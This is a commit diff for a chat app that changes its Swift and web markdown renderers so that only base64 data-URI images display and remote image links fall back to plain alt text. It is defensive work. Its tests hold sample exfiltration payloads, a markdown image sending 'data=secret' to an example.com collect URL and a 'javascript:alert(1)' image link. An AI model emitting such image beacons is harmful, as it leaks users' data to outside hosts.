fix: flatten remote markdown images

This commit is contained in:
Ayaan Zaidi
2026-03-07 19:16:11 +05:30
committed by Ayaan Zaidi
parent 53a7e3b6e5
commit 4bf902de58
6 changed files with 133 additions and 19 deletions

View File

@@ -13,6 +13,8 @@ enum ChatMarkdownPreprocessor {
"Chat history since last reply (untrusted, for context):",
]
private static let markdownImagePattern = #"!\[([^\]]*)\]\(([^)]+)\)"#
struct InlineImage: Identifiable {
let id = UUID()
let label: String
@@ -27,8 +29,7 @@ enum ChatMarkdownPreprocessor {
static func preprocess(markdown raw: String) -> Result {
let withoutContextBlocks = self.stripInboundContextBlocks(raw)
let withoutTimestamps = self.stripPrefixedTimestamps(withoutContextBlocks)
let pattern = #"!\[([^\]]*)\]\((data:image\/[^;]+;base64,[^)]+)\)"#
guard let re = try? NSRegularExpression(pattern: pattern) else {
guard let re = try? NSRegularExpression(pattern: self.markdownImagePattern) else {
return Result(cleaned: self.normalize(withoutTimestamps), images: [])
}
@@ -44,24 +45,41 @@ enum ChatMarkdownPreprocessor {
for match in matches.reversed() {
guard match.numberOfRanges >= 3 else { continue }
let label = ns.substring(with: match.range(at: 1))
let dataURL = ns.substring(with: match.range(at: 2))
let image: OpenClawPlatformImage? = {
guard let comma = dataURL.firstIndex(of: ",") else { return nil }
let b64 = String(dataURL[dataURL.index(after: comma)...])
guard let data = Data(base64Encoded: b64) else { return nil }
return OpenClawPlatformImage(data: data)
}()
images.append(InlineImage(label: label, image: image))
let source = ns.substring(with: match.range(at: 2))
let start = cleaned.index(cleaned.startIndex, offsetBy: match.range.location)
let end = cleaned.index(start, offsetBy: match.range.length)
cleaned.replaceSubrange(start..<end, with: "")
if let inlineImage = self.inlineImage(label: label, source: source) {
images.append(inlineImage)
cleaned.replaceSubrange(start..<end, with: "")
} else {
cleaned.replaceSubrange(start..<end, with: self.fallbackImageLabel(label))
}
}
return Result(cleaned: self.normalize(cleaned), images: images.reversed())
}
private static func inlineImage(label: String, source: String) -> InlineImage? {
let trimmed = source.trimmingCharacters(in: .whitespacesAndNewlines)
guard let comma = trimmed.firstIndex(of: ","),
trimmed[..<comma].range(
of: #"^data:image\/[^;]+;base64$"#,
options: [.regularExpression, .caseInsensitive]) != nil
else {
return nil
}
let b64 = String(trimmed[trimmed.index(after: comma)...])
let image = Data(base64Encoded: b64).flatMap(OpenClawPlatformImage.init(data:))
return InlineImage(label: label, image: image)
}
private static func fallbackImageLabel(_ label: String) -> String {
let trimmed = label.trimmingCharacters(in: .whitespacesAndNewlines)
return trimmed.isEmpty ? "image" : trimmed
}
private static func stripInboundContextBlocks(_ raw: String) -> String {
guard self.inboundContextHeaders.contains(where: raw.contains) else {
return raw

View File

@@ -18,6 +18,30 @@ struct ChatMarkdownPreprocessorTests {
#expect(result.images.first?.image != nil)
}
@Test func flattensRemoteMarkdownImagesIntoText() {
let base64 = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQIHWP4////GQAJ+wP/2hN8NwAAAABJRU5ErkJggg=="
let markdown = """
![Leak](https://example.com/collect?x=1)
![Pixel](data:image/png;base64,\(base64))
"""
let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown)
#expect(result.cleaned == "Leak")
#expect(result.images.count == 1)
#expect(result.images.first?.image != nil)
}
@Test func usesFallbackTextForUnlabeledRemoteMarkdownImages() {
let markdown = "![](https://example.com/image.png)"
let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown)
#expect(result.cleaned == "image")
#expect(result.images.isEmpty)
}
@Test func stripsInboundUntrustedContextBlocks() {
let markdown = """
Conversation info (untrusted metadata):

View File

@@ -1712,6 +1712,22 @@
return text.replace(/<(?=[a-zA-Z/])/g, "&lt;");
}
const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i;
function normalizeMarkdownImageLabel(text) {
const trimmed = typeof text === "string" ? text.trim() : "";
return trimmed || "image";
}
function renderMarkdownImage(token) {
const label = normalizeMarkdownImageLabel(token?.text);
const href = typeof token?.href === "string" ? token.href.trim() : "";
if (!INLINE_DATA_IMAGE_RE.test(href)) {
return escapeHtml(label);
}
return `<img src="${escapeHtml(href)}" alt="${escapeHtml(label)}">`;
}
// Configure marked with syntax highlighting and HTML escaping for text
marked.use({
breaks: true,
@@ -1750,6 +1766,9 @@
html(token) {
return escapeHtml(token.text);
},
image(token) {
return renderMarkdownImage(token);
},
},
});

View File

@@ -250,4 +250,38 @@ describe("export html security hardening", () => {
expect(img?.getAttribute("onerror")).toBeNull();
expect(img?.getAttribute("src")).toBe("data:application/octet-stream;base64,AAAA");
});
it("flattens remote markdown images but keeps data-image markdown", () => {
const dataImage = "data:image/png;base64,AAAA";
const session: SessionData = {
header: { id: "session-4", timestamp: now() },
entries: [
{
id: "1",
parentId: null,
timestamp: now(),
type: "message",
message: {
role: "assistant",
content: [
{
type: "text",
text: `Leak:\n\n![exfil](https://example.com/collect?data=secret)\n\n![pixel](${dataImage})`,
},
],
},
},
],
leafId: "1",
systemPrompt: "",
tools: [],
};
const { document } = renderTemplate(session);
const messages = document.getElementById("messages");
expect(messages).toBeTruthy();
expect(messages?.querySelector('img[src^="https://"]')).toBeNull();
expect(messages?.textContent).toContain("exfil");
expect(messages?.querySelector(`img[src="${dataImage}"]`)).toBeTruthy();
});
});

View File

@@ -30,11 +30,10 @@ describe("toSanitizedMarkdownHtml", () => {
expect(html).toContain("console.log(1)");
});
it("preserves img tags with src and alt from markdown images (#15437)", () => {
it("flattens remote markdown images into alt text", () => {
const html = toSanitizedMarkdownHtml("![Alt text](https://example.com/image.png)");
expect(html).toContain("<img");
expect(html).toContain('src="https://example.com/image.png"');
expect(html).toContain('alt="Alt text"');
expect(html).not.toContain("<img");
expect(html).toContain("Alt text");
});
it("preserves base64 data URI images (#15437)", () => {
@@ -43,11 +42,17 @@ describe("toSanitizedMarkdownHtml", () => {
expect(html).toContain("data:image/png;base64,");
});
it("strips javascript image urls", () => {
it("flattens non-data markdown image urls", () => {
const html = toSanitizedMarkdownHtml("![X](javascript:alert(1))");
expect(html).toContain("<img");
expect(html).not.toContain("<img");
expect(html).not.toContain("javascript:");
expect(html).not.toContain("src=");
expect(html).toContain("X");
});
it("uses a plain fallback label for unlabeled markdown images", () => {
const html = toSanitizedMarkdownHtml("![](https://example.com/image.png)");
expect(html).not.toContain("<img");
expect(html).toContain("image");
});
it("renders GFM markdown tables (#20410)", () => {

View File

@@ -43,6 +43,7 @@ const MARKDOWN_CHAR_LIMIT = 140_000;
const MARKDOWN_PARSE_LIMIT = 40_000;
const MARKDOWN_CACHE_LIMIT = 200;
const MARKDOWN_CACHE_MAX_CHARS = 50_000;
const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i;
const markdownCache = new Map<string, string>();
function getCachedMarkdown(key: string): string | null {
@@ -137,6 +138,19 @@ export function toSanitizedMarkdownHtml(markdown: string): string {
// pages) as formatted output is confusing UX (#13937).
const htmlEscapeRenderer = new marked.Renderer();
htmlEscapeRenderer.html = ({ text }: { text: string }) => escapeHtml(text);
htmlEscapeRenderer.image = (token: { href?: string | null; text?: string | null }) => {
const label = normalizeMarkdownImageLabel(token.text);
const href = token.href?.trim() ?? "";
if (!INLINE_DATA_IMAGE_RE.test(href)) {
return escapeHtml(label);
}
return `<img src="${escapeHtml(href)}" alt="${escapeHtml(label)}">`;
};
function normalizeMarkdownImageLabel(text?: string | null): string {
const trimmed = text?.trim();
return trimmed ? trimmed : "image";
}
function escapeHtml(value: string): string {
return value